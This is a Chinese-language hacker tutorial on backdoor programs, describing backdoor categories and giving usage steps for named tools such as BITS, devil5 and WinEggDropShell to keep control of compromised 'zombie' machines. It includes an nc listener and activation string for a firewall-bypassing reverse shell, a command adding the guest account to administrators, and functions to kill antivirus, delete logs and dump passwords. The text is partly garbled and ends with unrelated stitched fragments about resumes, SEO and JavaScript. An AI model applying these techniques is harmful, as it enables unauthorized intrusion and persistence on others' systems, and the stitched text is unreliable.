什麼是後門程式
後門程式又稱特洛伊木馬,其用途在於潛伏在電腦中,從事蒐集資訊或便於黑客進入的動作。後程式和電腦病毒最大的差別,在於後門程式不一定有自我複製的動作,也就是後門程式不一定會「感染」其他電腦。
後門是一種登入系統的方法,它不僅繞過系統已有的安全設定,而且還能挫敗系統上各種增強的安全設定。
後門是一種登入系統的方法,它不僅繞過系統已有的安全設定,而且還能挫敗系統上各種增強的安全設定。
後門包括從簡單到奇特,有很多的型別。簡單的後門可能只是建立乙個新的賬號,或者接管乙個很少使用的賬號;複雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全訪問權。例如乙個login程式,你當輸入特定的密碼時,你就能以管理員的許可權來訪問系統。
後門能相互關聯,而且這個技術被許多黑客所使用。例如,黑客可能使用密碼破解乙個或多個賬號密碼,黑客可能會建立乙個或多個賬號。乙個黑客可以訪問這個系統,黑客可能使用一些技術或利用系統的某個漏洞來提公升許可權。黑客可能使用一些技術或利用系統的某個漏洞庭湖來提公升許可權。黑客可能會對系統的配置檔案進行小部分的修改,以降低系統的防衛效能。也可能會安裝乙個木馬程式,使系統開啟乙個安全漏洞,以利於黑客完全掌握系統。
以上是在網路上常見的對「後門」的解釋,其實我們可以用很簡單的一句話來概括它:後門就是留在計算機系統中,供某位特殊使用都通過某種特殊方式控制計算機系統的途徑!——很顯然,掌握好後門技術是每個網路安全愛好者不可或缺的一項基本技能!它能讓你牢牢抓住肉雞,讓它永遠飛不出你的五指山!
下文將以筆者從事網路安全多年的工作經驗為基礎,給廣大的網路初級安全愛好者講解一些網路上常用的後門的種類和使用方法以及技巧,希望大家能在最短的時間內學習到最好的技術,提公升自己的網路安全技術水平!
後門的分類
1.網頁後門
此類後門程式一般都是伺服器上正常的web服務來構造自己的連線方式,比如現在非常流行的asp、cgi指令碼後門等。
2。執行緒插入後門
利用系統自身的某個服務或者執行緒,將後門程式插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的乙個後門技術。
3擴充套件後門
所謂的「擴充套件」,是指在功能上有大的提公升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於乙個小的安全工具包,能實現非常多的常駐見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫郭後門「隱蔽」的初衷,具體看法就看各位使用都的喜好了。
4.c/s後門
和傳統的木馬程式類似的控制方法,採用「客記端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控**務器。
5.rootkit
這個需要單獨說明,其實把它單獨列乙個類在這裡是不太恰當的,但是,rootkit的出現大大改變了後門程式的思維角度和使用理念,可以說乙個好的rootkit就是乙個完全的系統殺手!後文我們講涉及到這方面,想念一定不會讓大家失望!
上面是按照技術做的分類,除了這些方面,正向連線後門、反向連線後門等分類也是很常見的,其實如何分類是程式設計者考慮的事,廣大的使用者就不用考慮那麼多了,我們看重的,只是功能!
入侵法定————精品後門
上面的「廢話」想念大家都看累了吧?好,下面我們來看看現在網路中滸的後門究竟長什麼模樣想學習網路安全並想提高的朋友看清楚了哦,這可是讓你的肉雞逃不出你的五指山的大好途徑!
這樣就啟用了bist,程式用
這個特徵的字元來辨認使用者,也就相當於你的密碼了,然後解除安裝:rundll32.exebits.dll,uninstall
這是最簡單的使用,這個後門除了隱蔽性好外,還有兩大特點是非常值得借鑑的:埠復用和正反向連線。雖然很多朋友經常聽到這兩個名詞,但並不了解它們,埠復用就是利用系統正常的tcp埠通訊和控制,比如80、139等,這樣的後門有個非常大的好處就是非常隱蔽,不用自己開端口也不會暴露自己的訪問,因為通訊本身就是系統的正常訪問!另乙個是反向連線,這個很常見,也是後門中乙個經典思路,因為從伺服器上主動方問外邊是不被禁止的,很多很歷害的防火牆就怕這點!
在本地使用nc監聽(如:nc-l-p1234)
用nc連線目標主機的任何乙個防火牆允許的tcp埠(80/139/445……)
輸入啟用命令:hkfx@dancewithdolphin[rxell]:1.1.1.1:2222
目標主機的cmd將會出現nc監聽的埠2222,這樣就實現了繞過防火牆的功能了。
devil5(魔鬼5號)
型別:系統後門
使用範圍:win200/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程式:★★★★☆
查殺難度:★★★☆☆
同bits一樣,devil5也是執行緒插入式的後門,和bits不同的是它可以很方便的在gui介面下按照自己的使用習慣定製埠和需要插入的執行緒,適合對系統有一定了解的使用都使用,由於是自定義插入執行緒,所以它更難被查殺,下面我們來看看它的使用。
運用舉例:
道德使用它自帶的配置程式editdevil5.exe對後門進行常規的配置,包括控制埠、插入執行緒、連線密碼、時間間隔等方面關鍵點是對插入執行緒的定製,一般設定成系統自帶的svchost,然後執行後門就可以控制了。
我們用tel***連線上去,連線的格式是:tel******定製的埠,它和其他後門不同之處在於連線後沒有提示的介面,每次執行程式也是分開的,必須要每次都有輸入密碼,比如我們丟掉了伺服器和管賬戶,可以啟用guest後再將guest加到管理員許可權,記得每次執行命令後加上「>密碼」就可以了:***localgroupadministratorsguest/add>hkfx,然後你又可以控**務器了。
很明顯示,同榕哥的bits相比,devil5有一些缺陷:不能通過系統自帶埠通訊、執行命令比較麻煩,需要每次輸入密碼而且不回顯示輸入內容,很容易出錯。但是,它有自己的優勢:插入執行緒可以自已定製,比如設定ie的執行緒為插入的目標就比較難被查殺:自己提供了專門的查殺工具deldevil5.exe,幫助防護者清理系統;而且它可以任意改名和繫結,使用靈活性上比bits強……大家選擇哪能款就看自己的喜好了。
另外,portlessbackdoor等工具也是此類的後門,功能強大,隱蔽性稍差,大家有興趣可以自己研究一下。
3.擴充套件後門
wineggdroupshell
型別:系統後門
使用範圍:win2000/xp/2003
隱蔽程度:★★★★☆
使用難度:★★☆☆☆
危害程度:★★★★☆
查殺難度:★★★★☆
當網路上剛推出這個後門的時候,非常多的人用它來替換自己原來使用的後門,一時間各處讚揚之聲迭起,但多為一些普通的打撈手的心聲,其實它和「後門」的原始定義是有出入的:一旦你需要實現越多的功能,那你的程式在執行、隱藏、穩定等方面就需要考慮非常多的問題,乙個疏忽就會導致全盤皆敗,所以不建議將此後門用在需要非常隱蔽的地方。
運用舉例
在安裝後門前,需要使用它自帶的editserver.exe程式對服務端進行非常詳細的配置,從10個具體配置中,包括了插入執行緒、密碼、ip登入郵件通告等方面,不難看出它的功能是非常強大的,隱蔽性也很強,下面說幾個在入侵中常用的功能,相信經常玩入侵的朋友一定能發現它的強大之處:
fport:列出程序到埠的列表,用於發現系統中執行程式所對應的埠,可以用來檢測常見的隱蔽的後門。
reboot:重啟系統,如果你上傳並執行了其他後門程式,並需要重啟機器以便讓後門正常工作,那使用這個命令吧!
shell:得到乙個dosshell,這個不多講了,直接得到伺服器或者肉雞上的cmdshell。
pskillpid或程式名:用於殺掉特定的服務,比如防毒軟體或者是防火牆。
execute程式:在後台中執行程式,比如sniffer等。
installterm埠:在沒有安裝終端服務的win2k服務版的系統中安裝終端服務,重啟系統後才生效,並可以自定義連線埠,比如不用3389而用其他埠。
stopservice/startservice:停止或者啟動某個系統服務,比如tel***。
cleanevent:刪除系統日誌。
redirect:tcp資料**,這個功能是後門程式中非常出色的乙個功能,可以通過某一埠的資料**來控制內網的機器,在滲透入侵的時候非常管用!
enumservice:列舉所有自動啟動的服務的資料,比如後門、木馬。
regedit:進入登錄檔操作模式,熟悉登錄檔的使用者終於在後門中找到了福音!
findpassword:得到所有登入使用者密碼,比我們常用的findpass功能可強多了。
……
總體來講,
wineggdropshell是後門程式中很出彩的乙個,它經過作者幾次大規模的修改和公升級,已經趨於穩定,功能的強大當然沒得說,但是由於功能太強大,被查殺和懷疑是難以避免的,所以很多人在使用wineggdropshell一段時間後就發現肉雞飛了,其實是很正常的事,我你出不用氣餒,其實用很簡單的方法就可以很好地提高它的隱蔽性,下文將有說明。
相對於wineggdropshell來說,獨孤劍客的winshell在功能上就不那麼全面了,但是筆者推薦新手更多的使用winshell而不是wineggdropshell,因為winshell功能除了獲得乙個shell以外,只加入了一些重啟、關閉伺服器的命令,功能相對簡單,但完全使用系統自帶的cmd來執行命令,對系統學習和掌握也是非常有幫助的!
winshell和wolf這兩者都是國內早期頂尖的後門程式,程式的編制無疑是非常經典的,新手學習時使用這兩款後門一定能讓你明白很多系統相關東西,了解很多入侵思路和方法。
c/s後門
傳統的木馬程式常常使用c/s構架,這樣的構架很方便控制,也在一定程度上避免了「
「五步」,讓簡歷入HR法眼!
有不少求職者都很不服氣,為什麼 企業在短短的幾分鐘內就可以判定我職業生涯的生死?憑什麼企業可以在幾分鐘內就淘汰我的 簡歷?以下這些企業篩選簡歷的流程和方法,也許可以讓你反思你的簡歷的問題到底出在 1.硬性指標是篩選第一關。企業篩選簡歷的第一關,首先關注的就是硬性選擇標準,企業設定較多的硬性標準為 1...
五步讓你成為SEO高手
1 分析競爭對手,做好 關鍵詞選擇我們做 優化說白了其實就是權衡 各方面的因素做好關鍵詞排名使用者體驗,關鍵詞就好比是貫穿於整個 優化過程中的一條主線,選擇好的關鍵詞可以起到事半功倍的效果,選擇 關鍵詞首先就是要避免出現違法字眼和搜素引擎所顧忌的詞語,其次就是看關鍵詞的搜尋量和競爭力的大小,因為做這...
讓我心碎的五道題
1.if a in window alert a 答案是undefined。首先js會把全部全域性的變數提前。所以此題能夠改動為 var a if a in window alert a 答案是1 首先要知道變數的宣告和函式的宣告都會提前,第二 函式的宣告會覆蓋變數的宣告。樣例 function v...